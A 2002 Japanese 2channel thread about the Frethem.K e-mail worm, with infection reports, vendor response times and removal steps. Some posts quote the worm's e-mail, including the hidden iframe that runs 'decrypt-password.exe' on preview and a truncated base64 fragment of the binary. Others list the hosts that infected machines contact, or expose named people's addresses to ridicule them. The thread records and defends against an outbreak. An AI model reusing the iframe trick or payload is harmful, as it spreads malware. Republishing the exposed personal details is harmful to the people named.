2ちゃんねる ■掲示板に戻る■ 全部 1- 最新50    
■ このスレッドは過去ログ倉庫に格納されています

【流行の】Frethem【ヨカーン】

1 :名無しさん@お腹いっぱい。:02/07/15 21:01.net
プレビューしただけで感染するウィルス「Frethem」に注意
〜15日19時現在、未対応のアンチウィルスソフトもあり

http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.htm

2 :名無しさん@お腹いっぱい。:02/07/15 21:04.net
でじこのこべやのtaskbar.exeはウイルスじゃないにょ

3 :名無しさん@お腹いっぱい。:02/07/15 21:06.net
ニュース速報+のスレ

【PC】件名が「Re: Your Password!」メールに注意、新種ウイルスが流行の兆し
http://news2.2ch.net/test/read.cgi/newsplus/1026721442/l50

4 :名無しさん@お腹いっぱい。:02/07/15 21:08.net
☆ウィルス情報&質問 総合スレッド☆part4の767以後
http://pc.2ch.net/test/read.cgi/sec/1024061532/767-


5 :名無しさん@お腹いっぱい。:02/07/15 21:10.net
>>1

かわいそうな作者タン…
ttp://www.vector.co.jp/soft/win31/util/se018881.html

6 :げっ:02/07/15 21:12.net
うちの会社でも一人に感染し、exeを実行してしまったので、200人以上にばらまかれました。

7 :cheshire_cat ◆CATJR.v6 :02/07/15 21:16.net
全てのWinマシンはIE6にしていたはずだったんだが。

今日になって判明。
気難しい大ボスのマシンがデフォだった。しかもOutlookじゃなくてOE利用。
Nortonの定義ファイルも大昔。

誰だよ、対処しないで放置したの(笑

8 :名無しさん@お腹いっぱい。:02/07/15 21:17.net
IE5.0ってパッチあててももうだめかな?
ギコの口が変になるから未だにバージョンアップしてないのだが・・・

9 :cheshire_cat ◆CATJR.v6 :02/07/15 21:20.net
>>8
スレ違いの話だけど。
IE6突っ込むなら、クリーンインストール後にやった方がいいよ。
何故かしらんけど、IE5.5にパッチとか散々入れた後だと、IE6インスコ直後から落ちまくりだった。

10 :げっ:02/07/15 21:22.net
ちなみに、アドレス一覧から宛先を指定しているようでは無かったです。
ひょっとすると、受信したメールのアドレスに対して全て送信していたかもしれません。

11 :名無しさん@お腹いっぱい。:02/07/15 21:26.net
こんな2ちゃんねらー気取りの厨房が立てたスレッドは嫌だ。


12 :名無しさん@お腹いっぱい。:02/07/15 21:27.net
アドレスを登録していない人にfromが自分のアドレスのメールが行った
人がいたのでそうかも。偽ったかもしらん。

13 :名無しさん@お腹いっぱい。:02/07/15 21:29.net
http://www.watch.impress.co.jp/internet/www/article/2002/0715/frethem.jpg
Becky!だ

14 :名無しさん@お腹いっぱい。:02/07/15 21:31.net
何て読むのよ? ふりーぜん?

15 :名無しさん@お腹いっぱい。:02/07/15 21:32.net
OEじゃ怖くてスクリーンショットとれなかったんだろ⊂ ´⌒つ゜ー゜)つ

16 :ななしちゃん:02/07/15 21:33.net
現地点ではNortonせんせでは亜種が引っかからないyo!

17 :げっ:02/07/15 21:33.net
ついでに、発信元になってしまった社内の方、Windows updateは最新の状況に
なっていました。Nortonのウイルス定義ファイルも最新だったようです。
その社員の方からばら撒かれたメールは、OutlookとOutlook expで添付ファイ
ルがあったり、無かったりの症状でした。
Outlook expを利用している方は、添付ファイルが見えてしまうようなので、と
もかくexeファイルを実行しないようにしてくださいネ。

18 :cheshire_cat ◆CATJR.v6 :02/07/15 21:35.net
>>17
保存しとく?って警告が出るはずなのにな。
そこで思いつかないってのは、困ったさんっすね。

19 :8:02/07/15 21:51.net
>>9
アドバイスサンクス
バージョンアップしよ。メーラがHTMLメール比対応のAL-MAILだからあんま気にしてなかったけど。
スレ違いにつきsage

>>14
トレンドマイクロによるとフレゼムKだそうな。

20 :名無しさん@お腹いっぱい。:02/07/15 21:56.net
シマンテック、ニュースすら流してないし・・・

21 :名無しさん@お腹いっぱい。:02/07/15 22:03.net
>20
情報でとるよ

22 :名無しさん@お腹いっぱい。:02/07/15 22:03.net
日本テレコムからウイルス キタ━━━━━━(゚∀゚)━━━━━━!!!!

Return-Path: <*********.ota@japan-telecom.co.jp>
Received: from sh.janog.gr.jp ([210.150.17.51]) by ****************
with ESMTP id <*****************************@sh.janog.gr.jp>;
Mon, 15 Jul 2002 15:**:** +0900
Received: by sh.janog.gr.jp (Postfix)
id 295BF3A618B; Mon, 15 Jul 2002 15:53:19 +0900 (JST)
Delivered-To: janog-outgoing@janog.gr.jp
Received: from Yellow.japan-telecom.co.jp (Yellow.japan-telecom.co.jp [210.146.35.35])
by sh.janog.gr.jp (Postfix) with ESMTP id CAB313A5F6F
for <janog-outgoing@janog.gr.jp>; Mon, 15 Jul 2002 15:53:18 +0900 (JST)
Received: from JTEnglish.japan-telecom.co.jp (localhost [127.0.0.1])
by Yellow.japan-telecom.co.jp (3.7W-Yellow) with ESMTP id g6F6r9409577
for <janog-outgoing@janog.gr.jp>; Mon, 15 Jul 2002 15:53:09 +0900 (JST)
Received: from AFRICA ([172.16.237.23])
by rs41ag02.japan-telecom.co.jp (Lotus Domino Release 5.0.8)
with SMTP id 2002071515523870:991 ;
Mon, 15 Jul 2002 15:52:38 +0900
From: *********.ota@japan-telecom.co.jp
To: janog-outgoing@janog.gr.jp
Subject: Re: Your password!
MIME-Version: 1.0
Date: Mon, 15 Jul 2002 15:52:39 +0900
Message-ID: <OF5C37EE24.9F67D683-ON49256BF7.0025C773@japan-telecom.co.jp>
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG

--L1db82sd319dm2ns0f4383dhG
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;

<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(Toshinori Ota)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

--L1db82sd319dm2ns0f4383dhG
Content-Type: audio/x-midi;
name=decrypt-password.exe
Content-ID: <W8dqwq8q918213>
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAvUy/dazJBjmsyQY5rMkGOMhFSjmkyQY4QLk2OYzJBjuguT45/MkGOgy1L
jg4yQY6DLUqOYzJBjmsyQY5jMkGOCS1SjmAyQY5rMkCOATJBjoMtV45lMkGOUmljaGsyQY4AAAAA

23 :cheshire_cat ◆CATJR.v6 :02/07/15 22:09.net
>>22
おぉ?

24 :名無しさん@お腹いっぱい。:02/07/15 22:11.net
脳豚 トロすぎ
さっさと対応せんかい 役立たずめが

25 :あげ:02/07/15 22:14.net
>>22
名前消しもれてますよ。(プ

26 :名無しさん@お腹いっぱい。:02/07/15 22:15.net
>>22

> <b>cancel</b><br><br>
> (Toshinori Ota)</font></BODY></HTML>
> <iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

実名晒してるぞ

27 :名無しさん@お腹いっぱい。:02/07/15 22:21.net
Norton は既に対応しとるよ


28 :げっ:02/07/15 22:21.net
あらららら。。。

29 :名無しさん@お腹いっぱい。:02/07/15 22:21.net
Toshinori Ota は、だれの名前かわからない。
To でも From でもないみたい。

Received: from AFRICA ([172.16.237.23])
の AFRICA って何でしょうか?
私のところには
Received: from AFRICA ([10.40.130.151])
から来ています。

30 :cheshire_cat ◆CATJR.v6 :02/07/15 22:23.net
>>29
トレンドだかシマンテックでそのIPアドレス見たような記憶。
今、何故かどっちとも繋がらないんだけど。

31 :名無しさん@お腹いっぱい。:02/07/15 22:25.net
HELO AFRICAは多分そのウイルスがSMTPに対して吐いてるコマンド。
アドレスは知らんけど、多分そのPCのIPでしょ。

32 :名無しさん@お腹いっぱい。:02/07/15 22:27.net
>>30
おいおい、おまいはプライベートアドレスをしらんのか。
ここ出入り禁止。

33 :名無しさん@お腹いっぱい。:02/07/15 22:30.net
俺、このウィルスばらまいたかも。
From のところ書き換えたりするよ。

34 :名無しさん@お腹いっぱい。:02/07/15 22:30.net
>>27
まだ対応していないよ。
02/07/15予定 (米国時間)

http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.k%40mm.html

35 :名無しさん@お腹いっぱい。:02/07/15 22:31.net
>>34
http://securityresponse.symantec.com/avcenter/venc/data/w32.frethem.k@mm.html
には予定、とか書いてないように見えるけど気のせいでしょうか


36 :名無しさん@お腹いっぱい。:02/07/15 22:32.net
そう、Fromを偽造する。
社内から山ほどウイルスが来たと思ったら全部社外のIPからだった。


37 :cheshire_cat ◆CATJR.v6 :02/07/15 22:32.net
>>29
漏れの勘違いでした。

Symantecにて、ver.Jとver.Kがそれぞれ別に掲載されました。
ver.k
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
ver.j
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html

TrendMicroでは、まだ1つしか掲載されてないっす。
まとめて見るURLって、どうやるんでしたっけ?
(概要) http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K
(詳細) http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.K&VSect=T

というか。漏れのところに届く、ファイルサイズがもっと小さいのがあるんすけど。

38 :ND:02/07/15 22:33.net
うちにも職場にもキターよ。
もう大騒ぎ(藁。

39 :cheshire_cat ◆CATJR.v6 :02/07/15 22:34.net
>>32
きゃは!恥かしい限りっす。
一瞬これと勘違いしました。

>ワームはシステム常駐後、以下のサイトにアクセスを試み続けます。これはWeb広告サイトの紹介システムのポイントを稼ぐためと思われます:


40 :34:02/07/15 22:36.net
>>35
定義ファイルのリンク先に行ってみた?
まだ 12日付の定義で15日付の定義はでていないよ。

41 :素人:02/07/15 22:40.net
うちの大学でも大暴れしてた!
60通位来てて、鯖も落ちました

42 :cheshire_cat ◆CATJR.v6 :02/07/15 22:40.net
「ポイント」とやらからの収入を得るのって、誰なのか気になる〜
本名で登録していたなら、笑いっす。

43 :名無しさん@お腹いっぱい。:02/07/15 22:43.net
脳豚 遅い 役立たず

44 :ND:02/07/15 22:52.net
IFRAME実行系だから、とりあえずIE設定→カスタマイズ→IFRAME実行を無効でOKかな?

45 :名無しさん@お腹いっぱい。:02/07/15 22:57.net
嚢豚 AntiVirus がやっと対応しますた

46 :名無しさん@お腹いっぱい。:02/07/15 23:03.net
家のパソコンにも届きました。
アドレスで会社の人からとわかったんですが、家のPCのアドレスを
教えているのは会社では別の一人だけなんです。
その人に連絡したら自分は感染してないと言いました。

これって、ネットワーク感染ってことですか?
的外れな質問だったら許して下さいね。

47 :ムカついたんで晒す:02/07/15 23:08.net
感染すると以下のサイトに接続を繰り返す模様。
ポイント稼ぎ狙いの確信犯だな。
http://12.220.54.29/b.cgi
http://12.224.160.208/b.cgi
http://12.225.239.153/b.cgi
http://12.239.90.200/b.cgi
http://12.249.100.107/b.cgi
http://12.252.211.170/b.cgi
http://128.173.231.167/b.cgi
http://129.120.117.218/b.cgi
http://140.158.208.167/b.cgi
http://143.111.86.30/b.cgi
http://144.132.27.124/b.cgi
http://147.26.215.144/b.cgi
http://150.208.186.200/b.cgi
http://170.11.31.35/b.cgi
http://172.148.216.191/b.cgi
http://172.149.84.171/b.cgi
http://195.13.227.140/b.cgi
http://195.13.227.143/b.cgi
http://195.251.228.133/b.cgi
http://204.57.90.184/b.cgi
http://205.162.24.103/b.cgi
http://207.108.36.78/b.cgi
http://207.171.103.126/b.cgi
http://207.50.54.128/b.cgi
http://208.190.152.25/b.cgi
http://208.28.196.214/b.cgi
http://208.38.78.170/b.cgi
http://209.192.135.22/b.cgi
http://209.34.29.161/b.cgi
http://213.190.55.222/b.cgi
http://217.199.112.38/b.cgi
http://24.138.42.33/b.cgi
http://24.153.41.186/b.cgi
http://24.157.108.78/b.cgi
http://24.159.28.120/b.cgi


48 :47:02/07/15 23:09.net
続き
http://24.198.18.192/b.cgi
http://24.24.128.16/b.cgi
http://24.242.106.163/b.cgi
http://24.243.76.55/b.cgi
http://24.25.79.187/b.cgi
http://24.91.146.67/b.cgi
http://24.91.187.71/b.cgi
http://4.47.227.27/b.cgi
http://63.106.67.21/b.cgi
http://63.231.167.66/b.cgi
http://63.71.246.234/b.cgi
http://64.211.174.43/b.cgi
http://64.249.48.181/b.cgi
http://65.25.12.45/b.cgi
http://65.67.205.182/b.cgi
http://66.108.150.226/b.cgi
http://66.189.114.161/b.cgi
http://66.233.33.212/b.cgi
http://66.30.52.166/b.cgi
http://66.31.193.42/b.cgi
http://66.31.93.30/b.cgi
http://66.41.32.83/b.cgi
http://66.68.22.102/b.cgi
http://68.113.156.82/b.cgi
http://68.35.125.130/b.cgi
http://68.42.253.163/b.cgi
http://68.57.88.25/b.cgi
http://68.69.53.36/b.cgi


49 :名無しさん@お腹いっぱい。:02/07/15 23:13.net
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
> この亜種は、
> <a href="mailto:w32.frethem.k@mm.html">W32.Frethem.K@mm</a>として、
> 情報を提供しております。

クリックしたらちょっとビビったよ。

50 :名無しさん@お腹いっぱい。:02/07/15 23:14.net
まだ来ない。これってIEのキャッシュのHTML中のメールアドレスは
漁らないのかな。


51 :名無しさん@お腹いっぱい。:02/07/15 23:18.net
とにかくすごい量ダターヨ。

52 :名無しさん@お腹いっぱい。:02/07/15 23:25.net
うちは3通。
そのうちMLからが2通。ナンダカナ(´Å`)

53 :sage:02/07/15 23:30.net
しっかし脳豚は使えねーな。
未だに対策無しとは・・・ダメだこりゃ。

54 :名無しさん@お腹いっぱい。:02/07/15 23:32.net
とりあえずIFRAMEを切っとけば問題無しじゃないの?

55 :名無しさん@お腹いっぱい。:02/07/15 23:37.net
■ウィルス対策ベンダー各社Frethem.K対応時刻■

・トレンドマイクロ
  → 15日19時頃?
・ネットワークアソシエイツ
  → 15日19時頃?
・シマンテック
  → 15日23時頃?

各社が15時頃からパターンファイル作成開始したと
すると、シマンテックだけ倍近くかかってるってこと?
シマンテックだめじゃん・・・

56 :名無しさん@お腹いっぱい。:02/07/15 23:45.net
区分 お知らせ 
投稿日付 2002年07月15日(月) 20時55分29秒
投稿者 COOL管理者 メール webmaster@cool.ne.jp
時期・期間 指定無し
該当都市 なし
内容 ご利用いただきありがとう御座います。

recruit@cool.ne.jpよりワーム型ウイルス(Win32.Frethem.k)のメールが送信されている可能性が御座います。

Re: Your password!

上記の件名で送信されているメールに添付されているファイルは実行せず、必ず破棄されるようお願いいたします。
また、感染の疑いがある場合は早急に調査をされるようお願いいたします。
*ウイルスの詳細に関しては以下のURL等をご参照ください。
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp

現在、詳細を調査中ですが、詳しい事が分かり次第追ってご報告させていただきます。


57 :名無しさん@お腹いっぱい。:02/07/15 23:52.net
漏れ、オラクルメーリングリストから貰った(´Д`;)
メールのヘッダって公開していいの?

58 :名無しさん@お腹いっぱい。:02/07/16 00:11.net
公開してヨシ!


59 :名無しさん@お腹いっぱい。:02/07/16 00:16.net
ゼヒミセテクダサイ

60 :名無しさん@お腹いっぱい。:02/07/16 00:24.net
From - Wed Nov 14 22:32:40 2001
X-UIDL: ***********************************
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Apparently-To: ******@******.jp *****************.jp; 15 Jul 2002 19:25:28 +0900 (JST)
Return-Path: <***********@******.oracle.co.jp>
X-Track: 1: 40
Received: from ******.oracle.co.jp (202.***.136.**)
by ****************.jp with SMTP; 15 Jul 2002 19:25:25 +0900 (JST)
Received: from localhost (daemon@localhost)
by *******.oracle.co.jp (**************) with SMTP id *******;
Mon, 15 Jul 2002 19:13:07 +0900 (JST)
Received: by oracle.co.jp (bulk_mailer v1.13); Mon, 15 Jul 2002 19:12:40 +0900
Received: (from majordom@localhost)
by naoko.oracle.co.jp (***********) id *******
for terakoya_tech-going; Mon, 15 Jul 2002 19:12:40 +0900 (JST)
X-Authentication-Warning: *******.oracle.co.jp: majordom set sender to owner-terakoya_tech using -f
Received: from mx.ctc-g.co.jp (ns.ctc-g.co.jp [131.248.**.*])
by *****.oracle.co.jp (*************) with ESMTP id ********
for <**********@*****.oracle.co.jp>; Mon, 15 Jul 2002 19:12:38 +0900 (JST)
From: tsuyoshi.ikeda@*******.**.jp
Received: by mx.ctc-g.co.jp (CTC-GN mail 11/07/98) id *******; Mon, 15 Jul 2002 19:25:08 +0900 (JST)
Received: by mx1.ctc-g.co.jp (CTC-GN mail 04/16/98) id ********; Mon, 15 Jul 2002 16:37:47 +0900
Received: by ctcfe.ctc-g.co.jp (CTC-GN mail 11/12/01) id ********; Mon, 15 Jul 2002 16:38:25 +0900
Date: Mon, 15 Jul 2002 16:38:25 +0900
Message-Id: <200207150738.QAA14242@ctcfe.ctc-g.co.jp>
To: ************@*****.oracle.co.jp
Subject: [terakoya'tech'info:75] Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG

Sender: **********@*****.oracle.co.jp

--L1db82sd319dm2ns0f4383dhG
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(** *)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

61 :konishi≠折れ:02/07/16 00:32.net
Subject: InterScanメッセージ:受信者へ。ファイルブロックに適合したため処理が実行されました。
Date: Mon, 15 Jul 2002 21:09:10 +0900
From: <Administrator@turbolinux.co.jp>
To: <tl-users@meigetsu.turbolinux.co.jp>

InterScan for Microsoft Exchangeにより添付ファイルがブロックされました。

送信者 = konishi@mail.doshisha.ac.jp
受信者 = tl-users@meigetsu.turbolinux.co.jp
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 21:09:10

ファイルブロック時の処理:
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。InterScanにより削除が実行されました。


62 :tachiki≠折れ:02/07/16 00:33.net
Subject: InterScanメッセージ:受信者へ。ウイルスが検出されたか、または添付ファイルブロックの条件に一致しました。
Date: Mon, 15 Jul 2002 20:50:32 +0900
From: System Attendant <POO02-SA@pc-daiwabo.co.jp>
To: "'turbolist-ml@turbolinux.co.jp'" <turbolist-ml@turbolinux.co.jp>

InterScan for Microsoft Exchangeにより、メールに処理が実行されました。詳細は
次の通りです。

送信者 = tachiki@dd.iij4u.or.jp
受信者 = turbolist-ml@turbolinux.co.jp
件名 = Re: Your password!
検索実行時刻 = 07/15/2002 20:50:32
検索エンジン/パターン = 6.150-1001/317

ウイルス発見時の処理:
添付ファイル decrypt-password.exe は添付ファイルブロック設定に適合しました。
InterScanにより移動が実行されました。 添付ファイルは
D:\Trend\Isme\Alert\decrypt-password3d32b70816c.exe_ に移動されました。

受信者への警告! InterScanによりウイルスが検出されました。


63 :名無しさん@お腹いっぱい。:02/07/16 00:34.net
なんだ、実験講師か。

64 :名無しさん@お腹いっぱい。:02/07/16 00:37.net
Date: Mon, 15 Jul 2002 21:30:07 +0900
From: "奥原 浩" <2000z28@kumagaya-h.ed.jp>
Reply-To: <2000z28@kumagaya-h.ed.jp>
To: <turbolist-ml@turbolinux.co.jp>

http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。


--
*******************************************************

熊谷高校 COM事務局 奥原 浩
Kumagaya Boys' Highschool Webmaster Okuhara Hiroshi

Mail: 2000z28@kumagaya-h.ed.jp
HP:http://www.kumagaya-h.ed.jp

*******************************************************
--


アホかっちゅうの、MLに投げるなっちゅうの。


65 :名無しさん@お腹いっぱい。:02/07/16 00:40.net
COM事務局がコレかよ(w

66 :名無しさん@お腹いっぱい。:02/07/16 00:45.net
comかぁ。。。
.netかぁ。。。

MS逝ってよし!

67 : :02/07/16 00:47.net
ようやくノートンとInterscanで検出できるようになった

68 :名無しさん@お腹いっぱい。:02/07/16 00:58.net
Frethem.kのウィルスが来たのですが、
トレンドマイクロのホームページ見たら
「プレビューしただけで感染」と書いてありました。
もちろん何も知らないのでプレビューしたのですが、
そのときにメーラーが「ウィルスと思われるファイルがありますが…」と表示したのですが、
この場合も感染したことになるのでしょうか?
一応ウィルス検索のために
新規フォルダを作ってそこに保存したのですが。
危ないでしょうか?

69 :68:02/07/16 01:02.net
あ、ちなみに送られてきたのは
>>56のcoolからです

70 :名無しさん@お腹いっぱい。:02/07/16 01:06.net
>>68
対処方法
Windowsフォルダーにコピーされた taskbar.exe を削除する。
参考手順:
1.インターネット接続を遮断する。
(クライアント PC に接続されているイーサネットケーブルや無線 LAN カードを物理的に抜くのが確実で す。)
これによって、ウイルス が動作した場合にも、メール送信による感染拡大を防ぎます。
2.添付ファイルをもった該当メールのメッセージを削除する。
3.Control キー、Alt キー、Delete キーを同時に押下し、プログラム一覧から taskbar を選択し、強制終了する。
4.「スタート」「検索」から、taskbar.exe を探し、削除する。
5.再起動する。

http://www.ipa.go.jp/security/topics/newvirus/frethem.html


71 :名無しさん@お腹いっぱい。:02/07/16 01:11.net
>>70
taskbar.exeが見当たらないってことは
感染してないってことでしょうか?

72 :名無しさん@お腹いっぱい。:02/07/16 01:13.net
>>71
そうです。文章をよく読みましょう。ハアト。

73 :名無しさん@お腹いっぱい。:02/07/16 01:28.net
Subject: そちらからウィルスが送られてきました
Date: Mon, 15 Jul 2002 22:02:23 +0900
From: "Yukihiro Yonehara" <acalanata@mm.neweb.ne.jp>
To: <turbolist-ml@turbolinux.co.jp>

http://www.ipa.go.jp/security/topics/newvirus/frethem.html
をご覧ください。そちらから、ウィルス付メールが送られてきました。

至急、対応願います。
米原 幸宏




やかましいんじゃボゲッ!!
なにが至急、対応願いますだアホ


74 :名無しさん@お腹いっぱい。:02/07/16 01:40.net
シャープから来ますた。

Received: from rcpt-impgw.biglobe.ne.jp by biglobe.ne.jp (RCPT_GW)
id TAA10966; Mon, 15 Jul 2002 19:15:18 +0900 (JST)
Received: from tg4.sharp.co.jp (tg4.sharp.co.jp [211.4.241.22])
by rcpt-impgw.biglobe.ne.jp (mnmy/3916220502) with ESMTP id g6FAFGc10946
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:17 +0900 (JST)
Received: from tg.sharp.co.jp (unknown [10.65.37.38])
by tg4.sharp.co.jp (Postfix) with ESMTP id 8CB193C243
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:16 +0900 (JST)
Received: from ws2-tnr.sharp.co.jp (unknown [10.65.37.40])
by tg.sharp.co.jp (Postfix) with SMTP id 2B92511568A
for <xxx@xxx.biglobe.ne.jp>; Mon, 15 Jul 2002 19:15:15 +0900 (JST)
Received: FROM mail.sharp.co.jp BY ws2-tnr.sharp.co.jp ; Mon Jul 15 19:14:45 2002 +0900
Received: from AFRICA by mail.sharp.co.jp (8.10.2/1.1.2.11/09Feb01-0154PM)
id g6FAEjw0002344278; Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Date: Mon, 15 Jul 2002 19:14:45 +0900 (JST)
Message-Id: <200207151014.g6FAEjw0002344278@mail.sharp.co.jp>
From: audio_support@sharp.co.jp
To: xxx@xxx.biglobe.ne.jp
Subject: Re: Your password!
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=L1db82sd319dm2ns0f4383dhG
X-UIDL: 799792848084825F976256025F999313405F255

75 :名無しさん@お腹いっぱい。:02/07/16 02:10.net
レジストリに
taskbar display "RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY"

てあるんですけど これですか? これを削除すれば いいんですか?
初めてのことなんで。。。


76 :名無しさん@お腹いっぱい。:02/07/16 02:12.net
>>75

それは違う、解像度変更のタスクバーアイコンのやつだろ


77 :75:02/07/16 02:18.net
>>76
そうだったんですか・・ありがとうございます。
パッチ当ててないIEとOE使ってるヘタレなもんで。。
ウィルスメール受け取ったの今回が初めてなもんで(汗
まあ 明らかに怪しいメールだったんで プレビューで表示されたけど 添付ファイルだけは開けないでそのまま削除しといたんです。


78 :名無しさん@お腹いっぱい。:02/07/16 02:39.net
>>77
というかなんでパッチ当てないのかききたい。
へたれとか言ってる暇があったら当てれ。

79 :名無しさん@お腹いっぱい。:02/07/16 02:55.net
大学のサーバーが落ちますた

80 :名無しさん@お腹いっぱい。:02/07/16 03:14.net
>>64
こいつうちにもきたぞ何者だ?

81 :名無しさん@お腹いっぱい。:02/07/16 07:28.net
>>80
MLのROMで
MLへのポスト/リプライの仕方知らない人


82 :名無しさん@お腹いっぱい。:02/07/16 09:40.net
Subject: メーリングリスト停止のお願い
Date: Tue, 16 Jul 2002 00:42:37 +0900
From: 石川初男 <ishikawa@tmc-ipd.ac.jp>
To: turbolist-ml@turbolinux.co.jp

管理者殿
 ウィルスの発信元が貴殿のメーリングリストからのものになっています。
早急に停止を。


Subject: test
Date: Tue, 16 Jul 2002 00:52:00 +0900
From: 宮本 明 <a_miyamoto@njc.co.jp>
To: <turbolist-ml@turbolinux.co.jp>


Subject: test
Date: Tue, 16 Jul 2002 00:52:37 +0900
From: 宮本 明 <a_miyamoto@njc.co.jp>
To: <turbolist-ml@meigetsu.turbolinux.co.jp>



アホかっちゅうの

83 :名無しさん@お腹いっぱい。:02/07/16 10:12.net
このウィルスは送信者偽装するの?

84 :名無しさん@お腹いっぱい。:02/07/16 10:49.net
うざ
http://www.turbolinux.co.jp/dcforum/DCForumID11/4068.html

85 :名無しさん@お腹いっぱい。:02/07/16 11:32.net
感染してしまった人は以下を参照

手動削除手順:
1)不正プログラムの自動起動設定を削除します。
Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリの値を削除してください。

場所: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
値 : "Task Bar"="<Windowsディレクトリ>\taskbar.exe"

トレンドマイクロからコピペ
そしてwindowsディレクトリのtaskbar.exeを削除するのだ

86 :Frethem関連リンク:02/07/16 12:24.net
感染後の処置方法等は各ベンダーのサイトでご確認ください。
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.k%40mm.html
http://www.symantec.com/region/jp/sarcj/data/w/w32.frethem.j%40mm.html
http://www.trendmicro.co.jp/virusinfo/news2002/worm_frethem_k.asp
http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Frethem.l@MM
http://www.nai.com/japan/virusinfo/infoFrethem.asp

87 :名無しさん@お腹いっぱい。:02/07/16 12:37.net
「メールにウィルスがおったぞゴルァ」って本文のFrom:に
投げるのはやめれ>某組織
投げんならちゃんとenvelope fromに返せっつーの
ここは <> なメールも受け取らんし何考えてんだ

88 :名無しさん@お腹いっぱい。:02/07/16 12:51.net
うちにも2通来たけど、どっちも添付ファイルがなかった。
これは安全なのか?

89 :名無しさん@お腹いっぱい。:02/07/16 13:06.net
>>87
何も考えてない。

90 :名無しさん@お腹いっぱい。:02/07/16 13:33.net
題名に「ウィルス」と入れて欲しかった

91 :名無しさん@お腹いっぱい。:02/07/16 14:49.net
うちのは taskbar.exe を削除したのに、まだウイルスばら撒いてる。
なんで?

92 :名無しさん@お腹いっぱい。:02/07/16 15:29.net
>>91 「WORM_FRETHEM.K」駆除ツール使え↓
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=4305
駆除後はアンチウィルスソフト常駐させよ。

93 :名無しさん@お腹いっぱい。:02/07/16 15:46.net
>>87
KLEZ で詐称された From のアドレス宛に、ウィルス警告メールを送ってくる
対策ソフトもうざい。

94 :名無しさん@お腹いっぱい。:02/07/16 15:52.net
>>93 何のソフト?

95 :きんどーちゃん:02/07/16 16:03.net
やーねぇ。
昨日夕刻にきたわよ。
その場でノートンの更新をしたけど駄目だったのよ。
アドレス帳が”送ってはいけない人たち”リストになってたのよ。
今日は朝から脅しメールや電話が来まくるのよやーねぇ。

96 :きんどーちゃん:02/07/16 16:07.net
ちなみにあたしんちは三菱から来たわよ

97 :あぼーん:あぼーん.net
あぼーん

98 :ななしさん:02/07/16 16:17.net
>>93
InterScanだとenvelope-fromに送るみたいだけど。


99 :名無しさん@お腹いっぱい。:02/07/16 16:49.net
中京テレビのディズニーオンアイス事務局やられてねーか?
ディズニーオンアイス事務局あてのウイルス警告メールが
うちにがんがん流れてくるんだけど。なんで?
ちなみに本体は来てません。

100 :名無しさん@お腹いっぱい。:02/07/16 17:12.net
>>98 送らない設定にもできるみたいね。

101 :名無しさん@お腹いっぱい。:02/07/16 17:46.net
>99
ウチにもガンガンきてる・・・。ディズニーオンアイス・・・。

102 :名無しさん@お腹いっぱい。:02/07/16 19:51.net
こんな、2ch用語を多用したい盛りの2ちゃんねらー気取りの夏厨が立てた
スレッドは嫌だ。

103 :cheshire-cat ◆CATJR.v6 :02/07/16 20:05.net
>>98
Fromに直接返信する、困ったのがあるようなんですけど。
何なんでしょうね。

104 :メールヘッダは?:02/07/16 20:05.net
   

105 :Frethem.K感染者:02/07/16 20:32.net
envelop-from も偽造します。

106 :開いちゃった・・。:02/07/16 20:41.net
添付ファイルが無かったんで開いちゃった・・。赤い文字見て「?」と思って直ぐ削除。
アンチウィルスソフトのサイト見て直ぐにtaskbar.exeとかnotepad.iniとか
検索したけど無い。レジのrunも平気だった。
そもそも何で添付ファイルが無かったんだろう?

107 :cheshire-cat ◆CATJR.v6 :02/07/16 20:43.net
>>104
漏れ宛てのレスっすか?
各種っす。

>>105
